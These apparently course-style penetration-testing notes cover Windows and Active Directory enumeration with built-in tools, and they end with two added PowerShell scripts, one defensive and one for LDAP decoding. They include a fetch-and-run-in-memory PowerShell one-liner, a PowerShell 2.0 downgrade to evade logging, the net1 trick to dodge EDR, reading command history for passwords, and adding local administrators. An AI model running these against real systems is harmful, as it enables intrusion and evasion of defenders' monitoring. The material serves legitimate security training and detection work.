Living Off the Land

What if we cannot get an attack host, or cannot upload our tools onto a host? In that case we work with what is already installed on the system.

Here are some basic enumeration commands:

hostname

Prints the PC's Name

[System.Environment]::OSVersion.Version

Prints out the OS version and revision level

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patches and hotfixes applied to the host

ipconfig /all

Prints out network adapter state and configurations

set

Displays a list of environment variables for the current session (run from a CMD prompt)

echo %USERDOMAIN%

Displays the domain name to which the host belongs (run from a CMD prompt)

echo %logonserver%

Prints out the name of the Domain Controller the host checks in with (run from a CMD prompt)

We can also use the systeminfo command, which gives us all of this in a single command.

PowerShell

Get-Module

Lists available modules loaded for use.

Get-ExecutionPolicy -List

Will print the execution policy settings for each scope on a host.

Set-ExecutionPolicy Bypass -Scope Process

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

With this command, we can get the specified user's PowerShell history. This can be quite helpful, as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-ChildItem Env: | ft Key,Value

Returns environment values such as key paths, users, computer information, etc.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

This is a quick and easy way to download a file from the web using PowerShell and run it from memory.

Many defenders are unaware that several versions of PowerShell often exist on a host. If not uninstalled, they can still be used. PowerShell event logging was introduced as a feature in PowerShell 3.0. With that in mind, we can attempt to call PowerShell version 2.0 or older. If successful, our actions from the shell will not be logged in Event Viewer. We can downgrade PowerShell using:

powershell.exe -version 2

Note: The primary place to look is in the PowerShell Operational Log found under Applications and Services Logs > Microsoft > Windows > PowerShell > Operational. All commands executed in our session will log to this file. The Windows PowerShell log located at Applications and Services Logs > Windows PowerShell is also a good place to check. An entry will be made here when we start an instance of PowerShell.

Note: With Script Block Logging enabled, we can see that whatever we type into the terminal gets sent to this log. If we downgrade to PowerShell V2, this will no longer function correctly. Our actions afterwards will be masked, since Script Block Logging does not work below PowerShell 3.0. Notice above in the logs that we can see the commands we issued during a normal shell session, but logging stopped after starting a new PowerShell instance in version 2. Be aware that the action of issuing the command powershell.exe -version 2 within the PowerShell session will itself be logged!

Note: Event ID 400 indicates when a new PowerShell host process has started.
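The notes above describe the downgrade from the attacker's side; the script below is the corresponding check from the defender's side. It is an added example, not part of the original notes: it reports whether the PowerShell 2.0 engine is still installed, lists Event ID 400 entries in the Windows PowerShell log whose message records EngineVersion=2.0 (the HostApplication line in that event carries the command line, so the -version 2 invocation is visible there), and reads the Script Block Logging policy value. The function names are our own; the log name, event ID, optional-feature names and registry path are the documented Windows ones.

```powershell
# Added example (not from the original notes): audit a host for the conditions
# described above from the defender's side. Function names are our own; the
# event ID, log name, feature names and registry path are the documented ones.

function Get-PSv2EngineStatus {
    # Client SKUs ship the v2 engine as optional features named
    # MicrosoftWindowsPowerShellV2 / MicrosoftWindowsPowerShellV2Root; they should read "Disabled".
    if (Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
        Get-WindowsOptionalFeature -Online |
            Where-Object { $_.FeatureName -like 'MicrosoftWindowsPowerShellV2*' } |
            Select-Object FeatureName, State
    }
    elseif (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue) {
        # Server SKUs expose the same engine as the PowerShell-V2 feature.
        Get-WindowsFeature -Name PowerShell-V2 | Select-Object Name, InstallState
    }
}

function Get-PSv2EngineStarts {
    param([int]$Days = 30)
    # Event ID 400 ("Engine state is changed from None to Available") is written to the
    # classic "Windows PowerShell" log for every new host process. Its message contains
    # EngineVersion=<x.y> and HostApplication=<command line>, so a 2.0 engine start is
    # visible here even though nothing it runs afterwards reaches the script block log.
    $filter = @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = (Get-Date).AddDays(-$Days) }
    try   { $events = Get-WinEvent -FilterHashtable $filter -ErrorAction Stop }
    catch { return @() }   # Get-WinEvent throws when no events match the filter
    foreach ($e in $events) {
        if ($e.Message -match 'EngineVersion=2\.0') {
            $hostApp = ''
            if ($e.Message -match 'HostApplication=(.+)') { $hostApp = $Matches[1].Trim() }
            [pscustomobject]@{
                TimeCreated     = $e.TimeCreated
                HostApplication = $hostApp
            }
        }
    }
}

function Test-ScriptBlockLogging {
    # The policy that enables Script Block Logging is stored under this key; 1 means enabled.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $v = Get-ItemProperty -Path $key -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.EnableScriptBlockLogging -eq 1)
}

# Usage: run from an elevated PowerShell 5.1 session on the host being audited.
Get-PSv2EngineStatus
Get-PSv2EngineStarts -Days 30 | Format-Table -AutoSize
"Script Block Logging enabled: $(Test-ScriptBlockLogging)"
```

Get-WindowsOptionalFeature and Get-WindowsFeature need an elevated session; the event-log and registry checks do not. Any EngineVersion=2.0 row returned by Get-PSv2EngineStarts is worth investigating, because a supported host has no legitimate reason to start the 2.0 engine.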

Firewall Checks

Checking the Windows Firewall settings and status of Windows Defender using the netsh and sc utilities:

netsh advfirewall show allprofiles

We can check status of Windows Defender from CMD:

sc query windefend

We can also check the status and configuration settings of Defender:

Get-MpComputerStatus

It will show what revision our AV settings are at and what settings are enabled/disabled. We can tell how often scans are run, if the on-demand threat alerting is active, and more.

Are we alone?

Use the following command to check if others are logged on to this host:

qwinsta

Network Enumeration

arp -a

Lists all known hosts stored in the ARP table.

ipconfig /all

Prints out adapter settings for the host. We can figure out the network segment from here.

route print

Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.

netsh advfirewall show state

Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

The arp -a and route print commands are especially useful during black box testing where we have limited our scans. These commands show us which resources our host is already aware of, which can be used for lateral movement.

Windows Management Instrumentation (WMI)

Windows Management Instrumentation (WMI) is a scripting engine that is widely used within Windows enterprise environments to retrieve information and run administrative tasks on local and remote hosts. Here are some WMI quick checks:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patch level and description of the Hotfixes applied

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

Displays basic host information to include any attributes within the list

wmic process list /format:list

A listing of all processes on the host

wmic ntdomain list /format:list

Displays information about the Domain and Domain Controllers

wmic useraccount list /format:list

Displays information about all local accounts and any domain accounts that have logged into the device

wmic group list /format:list

Information about all local groups

wmic sysaccount list /format:list

Dumps information about any system accounts that are being used as service accounts.

We can print information about the domain, any child domains, and any external forests that our current domain has a trust with.

wmic ntdomain get Caption,Description,DnsForestName,DomainName,DomainControllerAddress

This cheatsheet has some useful commands for querying host and domain info using wmic.

Net.exe

Keep in mind that net.exe commands are typically monitored by EDR solutions and can quickly give up our location if our assessment has an evasive component.

net accounts

Information about password requirements

net accounts /domain

Password and lockout policy

net group /domain

Information about domain groups

net group "Domain Admins" /domain

List users with domain admin privileges

net group "domain computers" /domain

List of PCs connected to the domain

net group "Domain Controllers" /domain

List the computer accounts of the domain controllers

net group <domain_group_name> /domain

Users that belong to the group

net groups /domain

List of domain groups

net localgroup

All available local groups

net localgroup administrators /domain

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup Administrators

Information about a group (admins)

net localgroup administrators [username] /add

Add user to administrators

net share

Check current shares

net user <ACCOUNT_NAME> /domain

Get information about a user within the domain

net user /domain

List all users of the domain

net user %username%

Information about the current user

net use x: \\computer\share

Mount the share locally

net view

Get a list of computers

net view /all /domain[:domainname]

Shares on the domain

net view \\computer /ALL

List shares of a computer

net view /domain

List of PCs of the domain

Note: If you believe the network defenders are actively logging/looking for any commands out of the normal, you can try this workaround to using net commands. Typing net1 instead of net will execute the same functions without the potential trigger from the net string.

Note: net group "Domain Admins" /domain is a particularly useful command.

We can then query each of those users to get more information and to see whether the account is active, using net user <username> /domain

Dsquery

dsquery exists on any host with the Active Directory Domain Services role installed, and the dsquery DLL is present on all modern Windows systems by default at C:\Windows\System32\dsquery.dll. It is useful for querying objects in AD.

To run it, we need elevated privileges on the host, or we need to run PowerShell from a SYSTEM context. Here are some commands:

# user search
dsquery user
# computer search
dsquery computer

Or we can use a wildcard to list all the objects in an OU:

dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

We can, of course, combine dsquery with LDAP search filters of our choosing. The below looks for users with the PASSWD_NOTREQD flag set in the userAccountControl attribute:

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

The following command will list all domain controllers in the current domain, limited to 5 results:

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName

LDAP Filtering Explained

You will notice in the queries above that we are using strings such as userAccountControl:1.2.840.113556.1.4.803:=8192. These are standard LDAP filter expressions, and they work with several other tools as well, including the AD PowerShell module, ldapsearch, and many others. Let's break them down quickly:

userAccountControl:1.2.840.113556.1.4.803: specifies that we are matching against the User Account Control (UAC) attribute of an object. The middle portion is an Object Identifier (OID) naming the matching rule; it can take one of three values, explained below. =8192 is the decimal bitmask we want to match. Each UAC flag (for example "password not required" or "account is locked out") has its own bit value, and these values can be added together so that a single number represents several flags at once. Below is a quick list of potential values.

UAC Values

OID match strings

OIDs are rules used to match bit values with attributes, as seen above. For LDAP and AD, there are three main matching rules:

  1. 1.2.840.113556.1.4.803

When using this rule, as we did in the example above, we are saying the bit value must match completely to meet the search requirements. Great for matching a singular attribute.

  2. 1.2.840.113556.1.4.804

When using this rule, we are saying that we want our results to show a match if any bit in the chain matches. This works in the case of an object having multiple attributes set.

  3. 1.2.840.113556.1.4.1941

This rule is used to match filters that apply to the Distinguished Name of an object and will search through all ownership and membership entries.
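The dsquery filters above and the matching-rule explanation both come down to bit arithmetic on userAccountControl. The following is an added example, not part of the original notes: it decodes a userAccountControl value into flag names, evaluates the 803 ("all bits") and 804 ("any bit") rules against a few constructed sample accounts without touching a directory, and builds the corresponding filter string. The flag names and values are the documented userAccountControl constants; the function names and the sample accounts are our own.

```powershell
# Added example (not from the original notes): decode userAccountControl bitmasks and
# show what the two bitwise matching rules return on constructed sample objects.
# Flag values are the documented userAccountControl constants (decimal);
# the sample accounts below are made up.

$UacFlags = [ordered]@{
    SCRIPT                         = 1
    ACCOUNTDISABLE                 = 2
    HOMEDIR_REQUIRED               = 8
    LOCKOUT                        = 16
    PASSWD_NOTREQD                 = 32
    PASSWD_CANT_CHANGE             = 64
    ENCRYPTED_TEXT_PWD_ALLOWED     = 128
    TEMP_DUPLICATE_ACCOUNT         = 256
    NORMAL_ACCOUNT                 = 512
    INTERDOMAIN_TRUST_ACCOUNT      = 2048
    WORKSTATION_TRUST_ACCOUNT      = 4096
    SERVER_TRUST_ACCOUNT           = 8192
    DONT_EXPIRE_PASSWORD           = 65536
    SMARTCARD_REQUIRED             = 262144
    TRUSTED_FOR_DELEGATION         = 524288
    NOT_DELEGATED                  = 1048576
    USE_DES_KEY_ONLY               = 2097152
    DONT_REQ_PREAUTH               = 4194304
    PASSWORD_EXPIRED               = 8388608
    TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216
    PARTIAL_SECRETS_ACCOUNT        = 67108864
}

function ConvertFrom-UserAccountControl {
    param([Parameter(Mandatory)][int]$Value)
    # Emit the name of every flag whose bit is set in $Value.
    foreach ($name in $UacFlags.Keys) {
        if (($Value -band $UacFlags[$name]) -ne 0) { $name }
    }
}

function Test-UacMatchingRule {
    param(
        [Parameter(Mandatory)][int]$Value,
        [Parameter(Mandatory)][int]$Mask,
        [ValidateSet('1.2.840.113556.1.4.803', '1.2.840.113556.1.4.804')]
        [string]$Rule = '1.2.840.113556.1.4.803'
    )
    # 803 (LDAP_MATCHING_RULE_BIT_AND): every bit in $Mask must be set in $Value.
    # 804 (LDAP_MATCHING_RULE_BIT_OR):  at least one bit in $Mask must be set in $Value.
    $common = $Value -band $Mask
    if ($Rule -eq '1.2.840.113556.1.4.803') { return ($common -eq $Mask) }
    return ($common -ne 0)
}

function New-UacLdapFilter {
    param([Parameter(Mandatory)][int]$Mask, [string]$Rule = '1.2.840.113556.1.4.803')
    # Same shape as the filters passed to dsquery -filter, ldapsearch or Get-ADObject -LDAPFilter.
    "(&(objectCategory=person)(objectClass=user)(userAccountControl:${Rule}:=$Mask))"
}

# Constructed sample objects (not real accounts).
$samples = @(
    [pscustomobject]@{ Name = 'svc_backup'; UAC = 512 + 65536 }    # normal account, password never expires
    [pscustomobject]@{ Name = 'jdoe';       UAC = 512 + 32 }       # normal account, PASSWD_NOTREQD
    [pscustomobject]@{ Name = 'old_admin';  UAC = 512 + 2 + 32 }   # disabled and PASSWD_NOTREQD
    [pscustomobject]@{ Name = 'DC01$';      UAC = 8192 + 524288 }  # server trust, trusted for delegation
)

foreach ($s in $samples) {
    '{0,-12} {1,8}  {2}' -f $s.Name, $s.UAC, ((ConvertFrom-UserAccountControl -Value $s.UAC) -join ', ')
}

# Mask 34 = ACCOUNTDISABLE (2) + PASSWD_NOTREQD (32).
# Rule 803 returns only old_admin (both bits set); rule 804 returns jdoe and old_admin.
$mask = 2 + 32
foreach ($rule in '1.2.840.113556.1.4.803', '1.2.840.113556.1.4.804') {
    New-UacLdapFilter -Mask $mask -Rule $rule
    ($samples | Where-Object { Test-UacMatchingRule -Value $_.UAC -Mask $mask -Rule $rule }).Name -join ', '
}
```

The 803/804 distinction is exactly the difference between the two filters printed at the end: with 803 a single-flag mask such as 8192 matches only accounts that carry that flag, while a multi-flag mask requires every one of those flags; with 804 any one of the flags in the mask is enough. Decoding the raw value first, as ConvertFrom-UserAccountControl does, avoids misreading a compound number like 546 as a single flag.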
